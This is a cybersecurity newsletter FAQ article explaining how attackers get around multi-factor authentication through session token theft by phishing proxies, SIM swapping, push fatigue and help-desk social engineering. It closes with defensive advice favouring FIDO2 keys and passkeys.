Read My Latest Cybersecurity Newsletter For FREE By Clicking Here!

Additional menu

Pithy Security | Cybersecurity News

Pithy Security | Cybersecurity News

Why Does Enabling MFA Still Let Hackers Bypass My Login?

By - Get email updates

MFA protects the authentication moment, not what happens after. Hackers bypass MFA by stealing session tokens and cookies created after successful authentication, using phishing proxies that capture credentials in real-time, or exploiting weak MFA implementations like SMS codes and push notification fatigue.

Pithy Security | Cybersecurity FAQs – The Details

Question: Why does enabling MFA still let hackers bypass my login?

Asked by: Claude Sonnet 4.5

Answered by: Mike D (MrComputerScience) from Pithy Security.

Session Tokens Are The Real Target

MFA validates your identity once during login. After successful authentication, the system issues a session token or cookie that grants access without requiring MFA again. Attackers don’t need to bypass MFA if they can steal this token. Adversary-in-the-middle (AiTM) attacks position a proxy between you and the real login page. You authenticate normally, complete MFA successfully, and the proxy captures the resulting session token. The attacker then uses that token from their own device without triggering MFA because the token itself proves authentication already happened.

This technique defeated MFA during the MGM breach in 2023 and countless corporate compromises since. Attackers using tools like Evilginx2 or Modlishka create convincing proxy sites that pass your credentials and MFA codes to the real service while capturing the authenticated session. From the victim’s perspective, login works perfectly. From the attacker’s perspective, they just acquired persistent access that bypasses MFA entirely.

Weak MFA Methods Create Easy Targets

Not all MFA provides equal protection. SMS-based codes are vulnerable to SIM swapping attacks where hackers convince mobile carriers to transfer your number to their device. Push notification MFA suffers from fatigue attacks where attackers spam approval requests until you accidentally accept one. Time-based one-time passwords (TOTP) from authenticator apps can be phished in real-time through relay attacks that capture and use codes within their 30-60 second validity window.

Social engineering remains devastatingly effective. The MGM ransomware attack started with a simple phone call to the IT help desk. Attackers impersonated an employee found on LinkedIn, claimed they lost their phone, and convinced help desk staff to remove MFA from the account. Once MFA was disabled, compromised credentials granted full access. This cost MGM over $100 million. Organizations with weak identity verification procedures for MFA resets face similar risks regardless of which MFA technology they deploy.

FIDO2 and Passkeys Stop Most Bypass Techniques

Hardware security keys using FIDO2 protocols (like YubiKey or Google Titan) provide cryptographic proof of authentication that can’t be phished or proxied. These keys cryptographically bind to specific domains, making AiTM attacks ineffective because the key refuses to authenticate for lookalike domains. There’s no code to intercept, no push notification to approve, and no SMS to hijack. The authentication happens through a challenge-response protocol that verifies both the user’s physical possession of the key and the legitimacy of the service requesting authentication.

Passkeys (Apple’s implementation of FIDO2) offer similar protection without requiring separate hardware. They use biometrics combined with device-based cryptographic keys that sync securely across your devices. Attackers can’t phish what doesn’t leave your device, and proxy attacks fail because the cryptographic binding validates the exact domain. Organizations like Cloudflare report zero successful account compromises among users with mandatory hardware key MFA, compared to regular breach attempts against password and TOTP users.

What This Means For You

  • Replace SMS-based MFA with authenticator apps immediately because SIM swapping attacks cost carriers nothing to execute and succeed routinely.
  • Deploy hardware security keys or passkeys for high-value accounts like email, banking, and admin access where compromise creates maximum damage.
  • Monitor for post-authentication anomalies like new device logins, bulk data downloads, or OAuth app authorizations that indicate stolen session tokens.
  • Train help desk staff on social engineering tactics and implement strict identity verification procedures before processing any MFA reset requests.

Related Questions

  • 1
  • 2
  • 3

Want Cybersecurity Breakdowns Like This Every Week?

Subscribe to Pithy Security (Cybersecurity news made simple. No ads. No hype. Just signal.)

Subscribe (Free) → pithysecurity.substack.com

Read archives (Free) → pithysecurity.substack.com/archive

You’re reading Ask Pithy Security. Got a question? Email ask@pithysecurity.com (include your Substack pub URL for a free backlink).

You're already here. That means you take security seriously. I'm Mike D., and Pithy Security is where thousands of sharp minds come every week to stay ahead of the threats, breaches, and power moves reshaping the cybersecurity landscape. Security engineers, ethical hackers, IT pros, and everyday people who just want to protect themselves all read every issue because I don't bury the lede and I don't waste your time.

Ransomware, zero-days, AI-powered attacks, data privacy, and the high-stakes politics of digital defense. All of it, delivered without the jargon spiral. If you've been reading on the web, do yourself a favor and subscribe to the full experience below.

I may earn commissions from the affiliate link below. You get real tools that deliver real value. Everyone wins.

# 1 - Pithy Security | Cybersecurity News - The free newsletter that cuts through the breach noise and keeps you two steps ahead of the threat actors. Every issue lands with the 3 cybersecurity stories that actually matter this week, written in plain English without sacrificing depth. Five minutes. No filler. Join thousands of readers who refuse to be the last to know.

# 2 - Galaxy.AI, The All-in-One AI Platform - Why pay for ChatGPT, Midjourney, and three other tools when Galaxy.AI puts every top LLM, image generator, video tool, and ad creator in one place? One account. One flat price. Unlimited creative firepower. This is the unfair advantage your competitors don't have yet.

# 3 - Follow @mrcomputersci on X - Between issues, I'm on X posting real-time security hot takes, AI threat analysis, and threads that go deeper than any newsletter can. If you want to be in the room where it happens, follow along.

Reader Interactions

Comments